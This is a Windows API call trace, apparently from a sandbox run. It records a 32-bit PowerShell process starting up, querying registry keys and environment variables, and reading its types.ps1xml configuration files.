	[0224.330] RegCloseKey (hKey=0x358) returned 0x0
	[0224.330] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x7a4288, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0224.330] GetLastError () returned 0x3
	[0224.330] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e5f0 | out: phkResult=0x29e5f0*=0x358) returned 0x0
	[0224.331] RegQueryValueExW (in: hKey=0x358, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x29e634, lpData=0x0, lpcbData=0x29e630*=0x0 | out: lpType=0x29e634*=0x0, lpData=0x0, lpcbData=0x29e630*=0x0) returned 0x2
	[0224.331] RegCloseKey (hKey=0x358) returned 0x0
	[0224.340] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.341] GetLastError () returned 0xcb
	[0224.347] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e570 | out: phkResult=0x29e570*=0x358) returned 0x0
	[0224.348] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0x29e5d8, lpData=0x0, lpcbData=0x29e5d4*=0x0 | out: lpType=0x29e5d8*=0x1, lpData=0x0, lpcbData=0x29e5d4*=0x74) returned 0x0
	[0224.348] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0x29e5b8, lpData=0x0, lpcbData=0x29e5b4*=0x0 | out: lpType=0x29e5b8*=0x1, lpData=0x0, lpcbData=0x29e5b4*=0x74) returned 0x0
	[0224.348] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0x29e5b8, lpData=0x7a4288, lpcbData=0x29e5b4*=0x74 | out: lpType=0x29e5b8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x29e5b4*=0x74) returned 0x0
	[0224.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x29e138, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0224.349] GetLastError () returned 0xcb
	[0224.349] SetErrorMode (uMode=0x1) returned 0x1
	[0224.349] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x29e5b8 | out: lpFileInformation=0x29e5b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0224.349] GetLastError () returned 0xcb
	[0224.349] SetErrorMode (uMode=0x1) returned 0x1
	[0224.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x29e12c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0224.353] GetLastError () returned 0xcb
	[0224.353] SetErrorMode (uMode=0x1) returned 0x1
	[0224.353] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x29e5ac | out: lpFileInformation=0x29e5ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0224.353] GetLastError () returned 0xcb
	[0224.353] SetErrorMode (uMode=0x1) returned 0x1
	[0224.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x29e12c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0224.356] GetLastError () returned 0xcb
	[0224.356] SetErrorMode (uMode=0x1) returned 0x1
	[0224.356] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x29e5ac | out: lpFileInformation=0x29e5ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0224.356] GetLastError () returned 0xcb
	[0224.356] SetErrorMode (uMode=0x1) returned 0x1
	[0224.363] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.363] GetLastError () returned 0xcb
	[0224.365] GetACP () returned 0x4e4
	[0224.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x29dfbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0224.375] GetLastError () returned 0xcb
	[0224.375] SetErrorMode (uMode=0x1) returned 0x1
	[0224.486] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x360
	[0224.486] GetLastError () returned 0x0
	[0224.487] GetFileType (hFile=0x360) returned 0x1
	[0224.487] SetErrorMode (uMode=0x1) returned 0x1
	[0224.487] GetFileType (hFile=0x360) returned 0x1
	[0224.488] ReadFile (in: hFile=0x360, lpBuffer=0x2bbd270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2bbd270*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.489] GetLastError () returned 0x0
	[0224.490] ReadFile (in: hFile=0x360, lpBuffer=0x2bbd270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2bbd270*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.490] GetLastError () returned 0x0
	[0224.490] ReadFile (in: hFile=0x360, lpBuffer=0x2bbd270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2bbd270*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.490] GetLastError () returned 0x0
	[0224.491] ReadFile (in: hFile=0x360, lpBuffer=0x2bbd270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2bbd270*, lpNumberOfBytesRead=0x29e524*=0xcf3, lpOverlapped=0x0) returned 1
	[0224.491] GetLastError () returned 0x0
	[0224.491] ReadFile (in: hFile=0x360, lpBuffer=0x2bbc703, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2bbc703*, lpNumberOfBytesRead=0x29e524*=0x0, lpOverlapped=0x0) returned 1
	[0224.491] GetLastError () returned 0x0
	[0224.491] ReadFile (in: hFile=0x360, lpBuffer=0x2bbd270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2bbd270*, lpNumberOfBytesRead=0x29e524*=0x0, lpOverlapped=0x0) returned 1
	[0224.491] GetLastError () returned 0x0
	[0224.492] CloseHandle (hObject=0x360) returned 1
	[0224.492] GetLastError () returned 0x0
	[0224.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x29e084, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0224.493] GetLastError () returned 0x0
	[0224.493] SetErrorMode (uMode=0x1) returned 0x1
	[0224.493] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2bce5e4 | out: lpFileInformation=0x2bce5e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0224.493] GetLastError () returned 0x0
	[0224.493] SetErrorMode (uMode=0x1) returned 0x1
	[0224.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x29e050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0224.494] GetLastError () returned 0x0
	[0224.494] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e4a8 | out: phkResult=0x29e4a8*=0x360) returned 0x0
	[0224.494] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e4f0, lpData=0x0, lpcbData=0x29e4ec*=0x0 | out: lpType=0x29e4f0*=0x1, lpData=0x0, lpcbData=0x29e4ec*=0x56) returned 0x0
	[0224.494] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e4f0, lpData=0x7a4288, lpcbData=0x29e4ec*=0x56 | out: lpType=0x29e4f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x29e4ec*=0x56) returned 0x0
	[0224.494] RegCloseKey (hKey=0x360) returned 0x0
	[0224.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x29e050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0224.495] GetLastError () returned 0x0
	[0224.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x29dfe4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0224.495] GetLastError () returned 0x0
	[0224.645] GetSystemInfo (in: lpSystemInfo=0x29dc28 | out: lpSystemInfo=0x29dc28*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0224.646] VirtualQuery (in: lpAddress=0x29d3e4, lpBuffer=0x29e3e4, dwLength=0x1c | out: lpBuffer=0x29e3e4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x29dfbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0224.759] GetLastError () returned 0x0
	[0224.759] SetErrorMode (uMode=0x1) returned 0x1
	[0224.759] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x360
	[0224.759] GetLastError () returned 0x0
	[0224.759] GetFileType (hFile=0x360) returned 0x1
	[0224.759] SetErrorMode (uMode=0x1) returned 0x1
	[0224.759] GetFileType (hFile=0x360) returned 0x1
	[0224.759] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.760] GetLastError () returned 0x0
	[0224.760] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.760] GetLastError () returned 0x0
	[0224.761] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.761] GetLastError () returned 0x0
	[0224.761] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.761] GetLastError () returned 0x0
	[0224.762] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.762] GetLastError () returned 0x0
	[0224.763] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.763] GetLastError () returned 0x0
	[0224.763] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.763] GetLastError () returned 0x0
	[0224.763] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.763] GetLastError () returned 0x0
	[0224.763] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.763] GetLastError () returned 0x0
	[0224.764] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.764] GetLastError () returned 0x0
	[0224.765] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.765] GetLastError () returned 0x0
	[0224.765] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.765] GetLastError () returned 0x0
	[0224.765] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.765] GetLastError () returned 0x0
	[0224.765] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.765] GetLastError () returned 0x0
	[0224.766] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.766] GetLastError () returned 0x0
	[0224.766] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.766] GetLastError () returned 0x0
	[0224.766] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.766] GetLastError () returned 0x0
	[0224.769] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.769] GetLastError () returned 0x0
	[0224.769] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.769] GetLastError () returned 0x0
	[0224.769] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.769] GetLastError () returned 0x0
	[0224.769] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.769] GetLastError () returned 0x0
	[0224.769] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.770] GetLastError () returned 0x0
	[0224.770] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.770] GetLastError () returned 0x0
	[0224.770] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.770] GetLastError () returned 0x0
	[0224.770] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.770] GetLastError () returned 0x0
	[0224.770] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.771] GetLastError () returned 0x0
	[0224.771] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.771] GetLastError () returned 0x0
	[0224.771] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.771] GetLastError () returned 0x0
	[0224.771] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.771] GetLastError () returned 0x0
	[0224.772] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.772] GetLastError () returned 0x0
	[0224.772] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.772] GetLastError () returned 0x0
	[0224.772] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.772] GetLastError () returned 0x0
	[0224.772] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.772] GetLastError () returned 0x0
	[0224.777] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.777] GetLastError () returned 0x0
	[0224.777] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.777] GetLastError () returned 0x0
	[0224.777] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.777] GetLastError () returned 0x0
	[0224.778] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.778] GetLastError () returned 0x0
	[0224.778] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.778] GetLastError () returned 0x0
	[0224.778] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.778] GetLastError () returned 0x0
	[0224.778] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.778] GetLastError () returned 0x0
	[0224.779] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1000, lpOverlapped=0x0) returned 1
	[0224.779] GetLastError () returned 0x0
	[0224.779] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x1b4, lpOverlapped=0x0) returned 1
	[0224.779] GetLastError () returned 0x0
	[0224.779] ReadFile (in: hFile=0x360, lpBuffer=0x2c02a00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e524, lpOverlapped=0x0 | out: lpBuffer=0x2c02a00*, lpNumberOfBytesRead=0x29e524*=0x0, lpOverlapped=0x0) returned 1
	[0224.779] GetLastError () returned 0x0
	[0224.779] CloseHandle (hObject=0x360) returned 1
	[0224.779] GetLastError () returned 0x0
	[0224.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x29e084, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0224.779] GetLastError () returned 0x0
	[0224.779] SetErrorMode (uMode=0x1) returned 0x1
